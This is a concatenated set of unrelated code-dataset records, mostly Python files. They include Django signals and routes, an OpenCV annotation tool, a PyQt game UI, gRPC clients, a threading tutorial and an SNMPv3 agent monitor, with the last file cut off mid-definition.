EmailMultiAlternatives\nfrom rest_framework_simplejwt.tokens import RefreshToken\n\n\n@receiver(pre_save, sender=User)\ndef user_to_inactive(sender, instance, **kwargs):\n if instance._state.adding is True:\n instance.is_active = False\n\n\n@receiver(post_save, sender=User)\ndef email_verification(sender, instance, **kwargs):\n if kwargs['created']:\n user = instance\n\n merge_data = {\n 'user': user,\n 'protocol': \"http\",\n 'domain': '127.0.0.1:8000',\n 'token': RefreshToken.for_user(user=user).access_token\n }\n\n subject = render_to_string(\"email/email_verification/email_subject.txt\", merge_data).strip()\n html_body = render_to_string(\"email/email_verification/email_body.html\", merge_data)\n\n msg = EmailMultiAlternatives(subject=subject, to=[\"mbanach2@edu.cdv.pl\"])\n msg.attach_alternative(html_body, \"text/html\")\n msg.send()\n\n\npre_save.connect(user_to_inactive, sender=User)\npost_save.connect(email_verification, sender=User)\n\n","sub_path":"backend/shop_app/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"310171701","text":"import sys\n\ndef main():\n input = sys.stdin.readline\n sx, sy, tx, ty = map(int, input().rstrip().split())\n\n horiz = tx - sx\n vert = ty - sy\n\n first_move = \"U\"*vert + \"R\"*horiz + \"D\"*vert + \"L\"*horiz\n second_move_go = \"L\" + \"U\"*(vert+1) + \"R\"*(horiz+1) + \"D\"\n second_move_back = \"R\" + \"D\"*(vert+1)+ \"L\"*(horiz+1) + \"U\" \n print(first_move + 
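# Editor's worked example (not part of the submission): for input "0 0 1 1"
# we get horiz = 1 and vert = 1, so the three segments become
#   first_move       = "U" + "R" + "D" + "L"   -> "URDL"   (s -> t -> s)
#   second_move_go   = "L" + "UU" + "RR" + "D" -> "LUURRD" (detour from s to t)
#   second_move_back = "R" + "DD" + "LL" + "U" -> "RDDLLU" (detour from t to s)
# i.e. the second round trip bulges one cell outward so no edge is reused.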
second_move_go + second_move_back)\n\nif __name__ == \"__main__\":\n main()","sub_path":"Python_codes/p03836/s844258908.py","file_name":"s844258908.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"331972402","text":"import os\nimport sys\nimport cv2\nimport numpy as np\nimport xml.etree.ElementTree as ET\n\n\ndef exportXML(coords, label, img_dims, img_name, img_path, out_path):\n\n # create the file structure\n annotation = ET.Element('annotation')\n folder = ET.SubElement(annotation, 'folder')\n filename = ET.SubElement(annotation, 'filename')\n path = ET.SubElement(annotation, 'path')\n source = ET.SubElement(annotation, 'source')\n database = ET.SubElement(source, 'database')\n size = ET.SubElement(annotation, 'size')\n width = ET.SubElement(size, 'width')\n height = ET.SubElement(size, 'height')\n depth = ET.SubElement(size, 'depth')\n segmented = ET.SubElement(annotation, 'segmented')\n object = ET.SubElement(annotation, 'object')\n name = ET.SubElement(object, 'name')\n pose = ET.SubElement(object, 'pose')\n truncated = ET.SubElement(object, 'truncated')\n difficult = ET.SubElement(object, 'difficult')\n bndbox = ET.SubElement(object, 'bndbox')\n xmin = ET.SubElement(bndbox, 'xmin')\n ymin = ET.SubElement(bndbox, 'ymin')\n xmax = ET.SubElement(bndbox, 'xmax')\n ymax = ET.SubElement(bndbox, 'ymax')\n\n annotation.set('verified', 'yes')\n\n folder.text = \"images\"\n filename.text = img_name\n path.text = img_path\n database.text = \"CS497 Sign Language\"\n width.text = str(img_dims[0])\n height.text = str(img_dims[1])\n depth.text = str(img_dims[2])\n segmented.text = \"0\"\n name.text = label\n pose.text = \"Unspecified\"\n truncated.text = \"0\"\n difficult.text = \"0\"\n xmin.text = str(coords[0][0])\n ymin.text = str(coords[0][1])\n xmax.text = str(coords[1][0])\n ymax.text = str(coords[1][1])\n\n # create a new XML file with the results\n img_annot = ET.tostring(annotation)\n with open(out_path, 'wb') as f:\n f.write(img_annot)\n\n\ndef define_rect(image):\n \"\"\"\n Define a rectangular window by click and drag your mouse.\n\n Parameters\n ----------\n image: Input image.\n \"\"\"\n\n clone = image.copy()\n rect_pts = [] # Starting and ending points\n win_name = \"comp_frame\" # Window name\n\n def select_points(event, x, y, flags, param):\n\n nonlocal rect_pts\n if event == cv2.EVENT_LBUTTONDOWN:\n rect_pts = [(x, y)]\n\n if event == cv2.EVENT_LBUTTONUP:\n rect_pts.append((x, y))\n\n # draw a rectangle around the region of interest\n cv2.rectangle(clone, rect_pts[0], rect_pts[1], (255, 255, 255), 2)\n cv2.imshow(win_name, clone)\n\n cv2.namedWindow(win_name)\n cv2.setMouseCallback(win_name, select_points)\n\n while True:\n # display the image and wait for a keypress\n cv2.imshow(win_name, clone)\n key = cv2.waitKey(0) & 0xFF\n\n if key == ord(\"r\"): # Hit 'r' to replot the image\n clone = image.copy()\n\n elif key == ord(\" \"): # Hit 'c' to confirm the selection\n break\n elif key == ord(\"q\"):\n return None\n\n # close the open windows\n cv2.destroyWindow(win_name)\n\n return rect_pts\n\n\ndef draw_rect(frame, annotator_id, label):\n\n annot_dir_name = \"./annotations\"\n img_dir_name = \"./images\"\n os.listdir(annot_dir_name)\n\n coords = define_rect(frame)\n\n if coords is None:\n return None\n\n numImgs = len([f for f in os.listdir(img_dir_name) if f.endswith('.png')\n and os.path.isfile(os.path.join(img_dir_name, f))])\n id = \"{0:04d}\".format(numImgs + 1)\n\n img_dims 
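# Editor's sketch (hypothetical helper, distilled from exportXML above): the
# same ElementTree pattern reduced to a single Pascal-VOC-style <object> node.
import xml.etree.ElementTree as ET

def bbox_element(label, xmin, ymin, xmax, ymax):
    obj = ET.Element('object')
    ET.SubElement(obj, 'name').text = label
    box = ET.SubElement(obj, 'bndbox')
    for tag, val in zip(('xmin', 'ymin', 'xmax', 'ymax'), (xmin, ymin, xmax, ymax)):
        ET.SubElement(box, tag).text = str(val)
    return ET.tostring(obj)  # e.g. b'<object><name>hand</name><bndbox>...</bndbox></object>'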
= frame.shape\n img_name = f\"img_{annotator_id}_{id}.png\"\n\n img_path = os.path.join(img_dir_name, img_name)\n out_path = os.path.join(\n annot_dir_name, f\"annot_{annotator_id}_{id}.xml\")\n\n exportXML(coords, label, img_dims,\n img_name, img_path, out_path)\n\n cv2.imwrite(img_path, frame)\n\n\ndef main(video_file_name, annotator_id, label):\n cap = cv2.VideoCapture(video_file_name)\n img_comp = None\n img2comp_list = []\n back_frame = None\n front_frame = None\n count = 0\n auto_append = False\n auto_append_num = 0\n\n while True:\n ret, frame = cap.read()\n frame = cv2.resize(frame, (640, 480))\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n cv2.imshow(\"compress this?\", frame)\n\n if auto_append and count < auto_append_num:\n img2comp_list.append(frame)\n count += 1\n print(\"frame count:\", count, \"AUTO ADDED\")\n continue\n elif auto_append and count >= auto_append_num:\n auto_append = False\n\n key = cv2.waitKey() & 0xFF\n if key == ord(\"q\"):\n continue\n elif key == ord(\" \"):\n img2comp_list.append(frame)\n count += 1\n elif key == ord(\"d\"):\n back_frame = img2comp_list[0]\n comp_frame = np.zeros_like(back_frame, np.float32)\n diff = None\n \"\"\"\n for i_frame in img2comp_list:\n #diff = cv2.absdiff(i_frame, back_frame)\n diff = cv2.absdiff(back_frame, i_frame)\n cv2.accumulateWeighted(diff.astype(np.float32), comp_frame, 0.025)\n cv2.accumulateWeighted()\n cv2.imshow(\"diff\",diff)\n cv2.waitKey(0)\n \"\"\"\n print(\"compressing\", len(img2comp_list), \"frames\")\n for i in range(len(img2comp_list)-1):\n #diff = cv2.absdiff(i_frame, back_frame)\n diff = cv2.absdiff(img2comp_list[i+1], img2comp_list[i])\n cv2.accumulateWeighted(diff.astype(\n np.float32), comp_frame, 0.025)\n cv2.imshow(\"diff\", diff)\n cv2.waitKey(0)\n\n comp_frame = (comp_frame/comp_frame.max())*255\n comp_frame = comp_frame.astype(np.uint8)\n mean_val = cv2.mean(comp_frame)[0]\n\n #ret, comp_frame = cv2.threshold(comp_frame, int(mean_val/2), 255, cv2.THRESH_BINARY)\n comp_frame = cv2.cvtColor(comp_frame, cv2.COLOR_GRAY2BGR)\n cv2.imshow(\"comp_frame\", comp_frame)\n cv2.waitKey(0)\n draw_rect(comp_frame, annotator_id, label)\n elif key == ord(\"b\"):\n img2comp_list.pop()\n count -= 1\n elif key == ord(\"a\"):\n auto_append = True\n auto_append_num = int(input(\"How many frames to compress? 
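# Editor's sketch (hypothetical function, distilled from the 'd' branch above):
# accumulate inter-frame absolute differences into one motion-energy image.
import cv2
import numpy as np

def motion_energy(frames, alpha=0.025):
    acc = np.zeros_like(frames[0], np.float32)
    for prev, curr in zip(frames, frames[1:]):
        diff = cv2.absdiff(curr, prev)             # per-pixel motion between frames
        cv2.accumulateWeighted(diff.astype(np.float32), acc, alpha)
    acc = acc / max(float(acc.max()), 1e-6) * 255  # normalize to 0..255
    return acc.astype(np.uint8)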
: \"))\n print(auto_append_num, \"entered\")\n\n print(\"frame count:\", count)\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 4:\n print(\"Usage: python rec_vid.py video_file_name annotator_id label\")\n exit()\n\n video_file_name = sys.argv[1]\n annotator_id = sys.argv[2]\n label = sys.argv[3]\n main(video_file_name, annotator_id, label)\n","sub_path":"rec_vid.py","file_name":"rec_vid.py","file_ext":"py","file_size_in_byte":6697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"264228653","text":"'''\r\nCreated on 10.03.2013\r\n\r\n@author: soeren\r\n'''\r\n\r\nfrom PyQt4.QtCore import QAbstractTableModel, QModelIndex, QVariant, pyqtSlot, Qt\r\nfrom PyQt4.QtGui import QMessageBox, QIcon, qApp, QInputDialog, QMovie, QImage\r\n\r\nfrom qt.ui.navigation_widget import NavigationPage\r\nimport client.settings as clientsettings\r\n \r\nfrom client.ui.navigation_pages_ui.Ui_MainMenuPage import Ui_MainMenuPage\r\nfrom client.ui.navigation_pages_ui.Ui_GamePage import Ui_GamePage\r\nfrom client.ui.navigation_pages_ui.Ui_SearchGamePage import Ui_SearchGamePage\r\nfrom client.ui.navigation_pages_ui.Ui_SettingsPage import Ui_SettingsPage\r\n \r\nfrom client.ui.settings_pages import ProfileSettingsPage\r\n\r\nfrom client.net.server_finder import PyDurakServerFinder\r\n\r\n \r\n \r\nclass GamePage(NavigationPage):\r\n '''\r\n GamePage\r\n '''\r\n\r\n def __init__(self, pageId, parent, isNetGame = False):\r\n '''\r\n Constructor\r\n '''\r\n super(GamePage, self).__init__(pageId, parent)\r\n \r\n self.__is_netgame = isNetGame\r\n \r\n self.ui = Ui_GamePage()\r\n self.ui.setupUi(self)\r\n \r\n def initContent(self):\r\n print(\"Init Gameplay\")\r\n gameName = QInputDialog.getText(self, \"Spielname\", \"Gib dem Spiel einen Name:\")\r\n print(gameName)\r\n if self.__is_netgame:\r\n pass\r\n\r\n def resetContent(self):\r\n print(\"Reset Gameplay\")\r\n self.ui.chatBrowser.setText(\"\")\r\n self.ui.chatInput.setText(\"\")\r\n\r\n\r\n\r\n\r\nclass GameListModel(QAbstractTableModel):\r\n '''\r\n An abstract table model to display game info objects.\r\n '''\r\n \r\n def __init__(self, parent=None):\r\n super(GameListModel, self).__init__(parent)\r\n \r\n self.__data = []\r\n \r\n def rowCount(self, parent):\r\n return len(self.__data)\r\n \r\n def columnCount(self, parent):\r\n return 2 # game name and address\r\n \r\n def data(self, index, role):\r\n if (not index.isValid()) or index.row() > len(self.__data):\r\n return None\r\n \r\n if role == Qt.DisplayRole or role == Qt.EditRole:\r\n return str(self.__data[index.row()][index.column()])\r\n \r\n return None\r\n \r\n def addGame(self, server, game_list):\r\n self.beginInsertRows(QModelIndex(), 0, 0)\r\n for key in game_list:\r\n self.__data.append((server, game_list[key]))\r\n self.endInsertRows()\r\n \r\n \r\n \r\nclass SearchGamePage(NavigationPage):\r\n '''\r\n SearchGamePage\r\n '''\r\n\r\n def __init__(self, pageId, parent):\r\n '''\r\n Constructor\r\n '''\r\n super(SearchGamePage, self).__init__(pageId, parent)\r\n \r\n self.ui = Ui_SearchGamePage()\r\n self.ui.setupUi(self)\r\n\r\n self.__progress = QMovie(\":/icons/progress.gif\")\r\n self.__server_finder = PyDurakServerFinder(55560)\r\n self.__server_finder.started.connect(self.__searchStarted)\r\n self.__server_finder.stopped.connect(self.__searchStopped)\r\n self.__server_finder.found.connect(self.__serverFound)\r\n \r\n self.ui.gameTableView.setModel(GameListModel())\r\n \r\n @pyqtSlot()\r\n def __searchStarted(self):\r\n 
self.ui.searchBtn.setEnabled(False)\r\n self.ui.progressLabel.setMovie(self.__progress)\r\n self.__progress.start()\r\n \r\n @pyqtSlot()\r\n def __searchStopped(self):\r\n self.ui.searchBtn.setEnabled(True)\r\n self.__progress.stop()\r\n self.ui.progressLabel.clear()\r\n \r\n @pyqtSlot(str, dict)\r\n def __serverFound(self, server, game_list):\r\n print(\"Server found:\", server, game_list)\r\n self.ui.gameTableView.model().addGame(server, game_list)\r\n self.ui.gameTableView.update()\r\n \r\n @pyqtSlot()\r\n def searchNetGames(self):\r\n self.__server_finder.start()\r\n \r\n def initContent(self):\r\n self.ui.joinBtn.setEnabled(False)\r\n \r\n def resetContent(self):\r\n self.__server_finder.stop()\r\n self.ui.progressLabel.clear()\r\n \r\n \r\n \r\nclass SettingsPage(NavigationPage):\r\n '''\r\n SettingsPage\r\n '''\r\n\r\n def __init__(self, pageId, parent):\r\n '''\r\n Constructor\r\n '''\r\n super(SettingsPage, self).__init__(pageId, parent)\r\n \r\n self.ui = Ui_SettingsPage()\r\n self.ui.setupUi(self)\r\n \r\n self.__addPages()\r\n \r\n def __addPages(self): \r\n profilePage = ProfileSettingsPage()\r\n profilePage.setIcon(QIcon(\":/icons/personal.png\"))\r\n self.ui.pageWidget.addPage(profilePage)\r\n \r\n def resetContent(self):\r\n self.ui.pageWidget.reset()\r\n \r\n @pyqtSlot()\r\n def apply(self):\r\n try:\r\n self.ui.pageWidget.apply()\r\n clientsettings.saveAll()\n except:\r\n msgBox = QMessageBox()\r\n msgBox.setWindowIcon(QIcon(\":/icons/bug.png\"))\r\n msgBox.setWindowTitle(\"Fehler\") \r\n msgBox.setText(\"Ein Fehler beim Speichern der Einstellungen ist aufgetreten.\") \r\n msgBox.setStandardButtons(QMessageBox.Ok)\r\n msgBox.setDefaultButton(QMessageBox.Ok)\r\n msgBox.setIcon(QMessageBox.Critical)\r\n msgBox.exec_()\r\n \r\n self.navigateBack()\r\n\r\n\r\n\r\n \r\nclass MainMenuPage(NavigationPage):\r\n '''\r\n MainMenuPage\r\n '''\r\n \r\n def __init__(self, pageId, parent):\r\n '''\r\n Constructor\r\n '''\r\n super(MainMenuPage, self).__init__(pageId, parent)\r\n \r\n self.ui = Ui_MainMenuPage()\r\n self.ui.setupUi(self)\r\n \r\n self.__addChildren()\r\n\r\n def __addChildren(self):\r\n self.addChild(GamePage(\"newSinglePlayerGame\", self))\r\n self.addChild(GamePage(\"newNetGame\", self)) \r\n self.addChild(SearchGamePage(\"searchNetGame\", self))\r\n self.addChild(SettingsPage(\"settings\", self))\r\n \r\n @pyqtSlot()\r\n def quitGame(self):\r\n reply = QMessageBox.question(self, \r\n \"Spiel verlassen\", \r\n \"PyDurak wirklich beenden?\", \r\n QMessageBox.Yes | QMessageBox.No,\r\n QMessageBox.No)\r\n # TODO own navigation page?\r\n\r\n if reply == QMessageBox.Yes:\r\n qApp.quit()\r\n \r\n @pyqtSlot()\r\n def showSettingsPage(self):\r\n NavigationPage.navigate(self, \"settings\")\r\n \r\n @pyqtSlot()\r\n def showSearchNetGamePage(self):\r\n NavigationPage.navigate(self, \"searchNetGame\")\r\n \r\n @pyqtSlot() \r\n def showNewNetGamePage(self):\r\n NavigationPage.navigate(self, \"newNetGame\")\r\n \r\n @pyqtSlot()\r\n def showNewGamePage(self):\r\n NavigationPage.navigate(self, \"newSinglePlayerGame\")","sub_path":"pydurak/client/ui/navigation_pages.py","file_name":"navigation_pages.py","file_ext":"py","file_size_in_byte":6905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"620155351","text":"\"\"\"\r\nProject: ID Database - Add User\r\nVersion: V1.0\r\nAuthor: Josh Cooper\r\nBrief: A system that displays information, Based on their unique ID number.\r\n\"\"\"\r\n\r\n#Asks the user who they want to 
add.\r\nnewName = str(input(\"Who would you like to add to the database: \"))\r\n\r\n#Opens the SUPER COOL DATABASE!\r\nscdb = open(\"scdb.txt\", \"a\")\r\n\r\n#Writes the new entry to SCDB\r\nscdb.write(\"\\n\")\r\nscdb.write(newName)\r\n\r\n#Stop and save.\r\nscdb.close()","sub_path":"idDatabase-V1/addUser.py","file_name":"addUser.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"302779871","text":"# Copyright (c) 2021 TriggerMesh Inc.\n\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n\n# http://www.apache.org/licenses/LICENSE-2.0\n\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"TriggerMesh Eventstore client.\n\nEventStore is an interface for storing ephemeral data in an event flow.\n\nUsage:\n\nc = client.new(\"localhost:8080\")\nkv = c.new_kv()\nkv.set(\"foo\", str.encode(\"bar\"), ttl=180)\nprint(kv.get(\"foo\"))\n\"\"\"\n\nimport os\nimport grpc\n\nimport eventstore_pb2\n\nfrom eventstore_kv import KV\nfrom eventstore_map import Map\nfrom eventstore_queue import Queue\n\nclass Client:\n \"\"\"Client is a parent class of this module.\"\"\"\n def __init__(self, server):\n self.channel = grpc.insecure_channel(server)\n\n def new_kv(self, **kwargs):\n ttl = kwargs.get(\"ttl\", None)\n lock_key = kwargs.get(\"lock_key\", None)\n scope = self._define_scope(**kwargs)\n return KV(self, scope, ttl, lock_key)\n\n def new_map(self, key, **kwargs):\n ttl = kwargs.get(\"ttl\", None)\n lock_key = kwargs.get(\"lock_key\", None)\n scope = self._define_scope(**kwargs)\n return Map(self, key, scope, ttl, lock_key)\n\n def new_queue(self, key, **kwargs):\n lock_key = kwargs.get(\"lock_key\", None)\n scope = self._define_scope(**kwargs)\n return Queue(self, key, scope, lock_key)\n\n def close(self):\n return self.channel.close()\n\n def _define_scope(self, **kwargs):\n bridge = kwargs.get(\"bridge\", None)\n instance = kwargs.get(\"instance\", None)\n\n typ = eventstore_pb2.Instance\n if bridge is None and instance is None:\n typ = eventstore_pb2.Global\n elif bridge is not None and instance is None:\n typ = eventstore_pb2.Bridge\n return eventstore_pb2.ScopeType(\n type = typ,\n bridge = bridge,\n instance = instance\n )\n\ndef new(*args):\n server = os.environ.get(\"EVENTSTORE_URI\")\n if len(args) != 0:\n server = args[0]\n return Client(server)\n","sub_path":"eventstore/eventstore_client.py","file_name":"eventstore_client.py","file_ext":"py","file_size_in_byte":2291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"395665659","text":"from .meta import extractor, from_json\nfrom .batch_iter_factory import BatchIterFactoryFin, BatchIterFactoryInf\nfrom .transformers import segm_prob2msegm\n\nname2batch_iter_factory = {\n 'fin': BatchIterFactoryFin,\n 'inf': BatchIterFactoryInf\n}\n\n\nname2meta = {\n 'extractor': extractor,\n 'from_json': from_json\n}\n\n\nname2transform = {\n 'segm_prob2msegm': 
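# Editor's note: these name2* dicts act as registries resolved from config
# strings. A guarded lookup (hypothetical helper, not part of dpipe) might be:
#
#     def resolve(registry, name):
#         try:
#             return registry[name]
#         except KeyError:
#             raise ValueError('unknown name {!r}; options: {}'.format(
#                 name, sorted(registry)))
#
# e.g. resolve(name2batch_iter_factory, 'fin') -> BatchIterFactoryFin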
segm_prob2msegm\n}\n","sub_path":"dpipe/utils/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"244338730","text":"# Learning multithreading:\n# Start by running the tasks on a single thread\nimport time\nimport threading\n# Import the thread pool\nfrom concurrent.futures import ThreadPoolExecutor\n\npeople = ['zs', 'lsi', 'wangw', 'zhaoliu', 'wangermazi']\n\n\n# Task one:\ndef fist_methd(people):\n    for ps in people:\n        print(\"hello \" + ps + \". are you ok?\")\n        time.sleep(0.5)\n\n\n# Task two:\ndef senc_methd(people):\n    i = 1\n    for ps in people:\n        print(\"Customer: {}, your id is {}.\".format(ps, i))\n        i += 1\n        time.sleep(0.5)\n\n\nt = time.time()\n# Single-threaded calls\n# fist_methd(people)\n# senc_methd(people)\n# Multi-threaded calls\n# t1=threading.Thread(target=fist_methd,args=(people,))\n# t2=threading.Thread(target=senc_methd,args=(people,))\n# t1.start()\n# t2.start()\n# t1.join()\n# t2.join()\n# The calls above work, but thread creation and teardown must be managed by hand; that is best left to a thread pool\n# Use a thread pool\n# Initialize a thread pool with 5 workers\nexecutor = ThreadPoolExecutor(max_workers=5)\n# Pass the callable and its arguments separately; writing executor.submit(fist_methd(people)) would run the task synchronously before submitting\ntask1 = executor.submit(fist_methd, people)\ntask2 = executor.submit(senc_methd, people)\nprint(\"Total program run time: \" + str(time.time() - t))\n","sub_path":"01improve/11多线程.py","file_name":"11多线程.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"495494282","text":"import sys\n\nif __name__=='__main__':\n    if(len(sys.argv)<3):\n        print(\"USAGE: python \" + sys.argv[0] + \" boundaryFile Dir\")\n        exit(1)\n    boundaryFile = sys.argv[1]\n    fileDir = sys.argv[2]\n    \n    boundaryLine = open(boundaryFile).readlines()\n    for line in boundaryLine:\n        if '[' in line:\n            fields = line.strip().split()\n            file_id = fields[0];\n            file_name = fileDir + file_id + \".bnd_wsj\";\n            fid=open(file_name, \"w\")\n            boundary = fields[3];\n            fid.writelines(boundary + \" \")\n        else:\n            fields = line.strip().split()\n            boundary = fields[1];\n            fid.writelines(boundary + \" \")\n\n        if ']' in line:\n            fid.close()\n            continue\n\n","sub_path":"script/phn2bnd_new.py","file_name":"phn2bnd_new.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"484101146","text":"#!/usr/bin/python3\nimport os, time, signal\nfrom random import random\n# PySNMP High Level API. 
Commands: bulkCmd, getCmd, nextCmd and setCmd\nfrom pysnmp.hlapi import *\n# Data types used by PySNMP\nfrom pyasn1.type.univ import * \n# Multithreading\nimport threading\n# SNMP getter functions\nfrom snmpfun import *\n\n# Path to the config file\nCFG_FILE_PATH = '/etc/scripts/agent_list.conf'\n\n# Port\nSNMP_PORT = 161 \n\n# Path to the monitoring data\nSNMP_LOG_PATH = '/etc/monitoring'\n\n# SNMPv3 user\nSNMPv3_USER = { \n 'userName': 'arthur', \n 'authProtocol': usmHMACSHAAuthProtocol, # SHA (128bit)\n 'authKey': 'password',\n 'privKey': 'secret_key',\n 'privProtocol': usmAesCfb128Protocol # AES (128bit)\n }\n\n# Monitoring parameters\nTIME_INTERVAL = 300 \nTIME_WAIT_VALUE = 330\n\n# Save logs in .txt file\nSAVE_TXT = True\n\n\nclass FunctionThread(threading.Thread):\n \"\"\"A thread that runs a function with its arguments\"\"\"\n def __init__(self, function, *args):\n threading.Thread.__init__(self)\n self._function = function\n self._args = args\n \n def run(self):\n self._function(*self._args)\n\nclass MonitoringExit(Exception):\n \"\"\"Custom exception that is thrown when stopping monitoring\"\"\"\n pass\n\ndef monitoring_shutdown(signum, frame):\n \"\"\"Signal handler function\"\"\"\n raise MonitoringExit\n\ndef agent_monitor(stop_event, ips, snmp_port, db_directory, time_interval, snmpv3_user, data_collect_funs):\n \"\"\"Monitors an agent by regularly sending snmp get requests\"\"\"\n stop_event.wait(180)\n # Instantiate SNMP engine\n snmp_engine = SnmpEngine()\n\n # Instantiate user - SNMPv3\n user = UsmUserData(**snmpv3_user)\n\n # Instantiate transport protocol (UDP over IPv6)\n upd_targets = [Udp6TransportTarget((ip, snmp_port), timeout=2) for ip in ips] \n\n while not stop_event.is_set():\n for data_collect_fun in data_collect_funs:\n data_collect_fun(snmp_engine, user, upd_targets, db_directory, txt_backup=SAVE_TXT)\n # Wait before getting next data\n stop_event.wait(time_interval) \n\ndef main():\n threads = []\n stop_event = threading.Event()\n\n # Set signals handlers\n signal.signal(signal.SIGTERM, monitoring_shutdown)\n signal.signal(signal.SIGINT, monitoring_shutdown)\n\n # Initiate monitoring threads\n with open(CFG_FILE_PATH, 'r') as f:\n for line in f:\n agent_name, *agent_ips = line.split()\n db_directory = os.path.join(SNMP_LOG_PATH, agent_name)\n # Create DB directory\n if not os.path.exists(db_directory):\n os.makedirs(db_directory)\n # Initialize databases\n initialize_ram_info_db(db_directory, TIME_INTERVAL, TIME_WAIT_VALUE, txt_backup=SAVE_TXT)\n initialize_cpu_info_db(db_directory, TIME_INTERVAL, TIME_WAIT_VALUE, txt_backup=SAVE_TXT)\n initialize_ip_info_db(db_directory, TIME_INTERVAL, TIME_WAIT_VALUE, txt_backup=SAVE_TXT)\n # Monitored items\n monitored_items = [ip_info, ram_info, cpu_info]\n # Add thread to list of threads\n threads.append(FunctionThread(agent_monitor, stop_event, agent_ips, SNMP_PORT, db_directory, TIME_INTERVAL, SNMPv3_USER, monitored_items))\n \n try:\n # Start each thread\n for th in threads:\n th.start()\n # Keep this thread active, in order to cleanly stop each thread\n while True:\n time.sleep(1)\n\n except MonitoringExit:\n # Stop each thread\n stop_event.set()\n for th in threads:\n th.join()\n\nmain()\n","sub_path":"scripts/agentmonitor.py","file_name":"agentmonitor.py","file_ext":"py","file_size_in_byte":3649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"532815062","text":"from __future__ import print_function\nimport logging\n\nimport sys\n\nimport grpc\n\nimport 
flagging_pb2\nimport flagging_pb2_grpc\n\n\ndef runUserSubmit(uid, hk):\n with grpc.insecure_channel('0.0.0.0:50051') as channel:\n stub = flagging_pb2_grpc.PhotoFlaggingStub(channel)\n response = stub.UserSubmit(flagging_pb2.UserSubmitRequest(userId = uid, hashKey = hk))\n result = {\n 'rejected': response.rejected,\n 'existed': response.existed\n }\n return result\n\n\ndef runUserRequest(uid):\n with grpc.insecure_channel('0.0.0.0:50051') as channel:\n stub = flagging_pb2_grpc.PhotoFlaggingStub(channel)\n response = stub.UserRequest(flagging_pb2.UserRequestRequest(userId = uid))\n return response.unflaggedHash\n\n\ndef runAdminSubmit(hk):\n with grpc.insecure_channel('0.0.0.0:50051') as channel:\n stub = flagging_pb2_grpc.PhotoFlaggingStub(channel)\n response = stub.AdminSubmit(flagging_pb2.AdminSubmitRequest(hashKey = hk))\n result = {}\n ##create the output dictionary hash is the key, flag is the value\n for h, f in zip(response.hashKeyList, response.flaggedList):\n result[h] = f\n return result\n\ndef runAdminRequest(uid):\n with grpc.insecure_channel('0.0.0.0:50051') as channel:\n stub = flagging_pb2_grpc.PhotoFlaggingStub(channel)\n response = stub.AdminRequest(flagging_pb2.AdminRequestRequest(userId = uid))\n result = {}\n ##create the output dictionary hash is the key, flag is the value\n for h, f in zip(response.hashKeyList, response.flaggedList):\n result[h] = f\n return result\n\n\n\n\n\"\"\"\n##only for testing purpose\nif __name__ == '__main__':\n logging.basicConfig()\n \n ##command line input\n cli = ''\n\n ##hashed result\n hr = ''\n\n while cli != 'quit':\n cli = str(input('enter a string that you want to hash or quit: '))\n if (cli != 'quit'):\n hr = run_hashing(cli)\n print(\"result: \" + hr)\n\"\"\"\n\n\n","sub_path":"grpc/Storage_service/flagging_client.py","file_name":"flagging_client.py","file_ext":"py","file_size_in_byte":2022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"605132196","text":"from django.urls import path\n\n\nfrom . 
import views\n\nurlpatterns = [\n    path('', views.index, name='index'),\n    path('store/', views.store_page, name = 'store_page'),\n    path('Ordering/', views.flintordercatch, name = 'flintordercatch'),\n    path('product//', views.product_page, name = 'product_page'),\n    path('FlintCart///', views.addtoFlintCart, name='addtoFlintCart'),\n    path('FlintCart/', views.FlintCart_view, name='FlintCart_view'),\n    path('DeleteFlintCart//', views.delete_from_FlintCart, name='delete_from_FlintCart'),\n    path('UpdateFlintCart/', views.calculate_FlintCart, name='calculate_FlintCart'),\n    path('ClearFlintCart//', views.clear_whole_FlintCart, name='clear_whole_FlintCart'),\n    path('checkout//', views.checkout, name = 'checkout'),\n\n]","sub_path":"Flintwood/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"177847320","text":"from afs.exceptions.UbikError import UbikError\nfrom afs.dao.BaseDAO import BaseDAO,execwrapper\nfrom afs.util import afsutil\nimport UbikPeerDAO_parse as PM\n\n\nclass UbikPeerDAO(BaseDAO):\n    \n    \"\"\"\n    DAO wrapping the udebug command line tool\n    \"\"\"\n    \n    def __init__(self) :\n        BaseDAO.__init__(self)\n        return\n    \n    @execwrapper \n    def getLongInfo(self,name_or_ip,port,_cfg=None) : \n        \"\"\"\n        return dict containing all info from a udebug -long\n        \"\"\"\n        CmdList=[_cfg.binaries[\"udebug\"],\"-server\", \"%s\" % name_or_ip, \"-port\", \"%s\" % port, \"-long\"]\n        return CmdList,PM.parse_getLongInfo\n    \n    @execwrapper \n    def 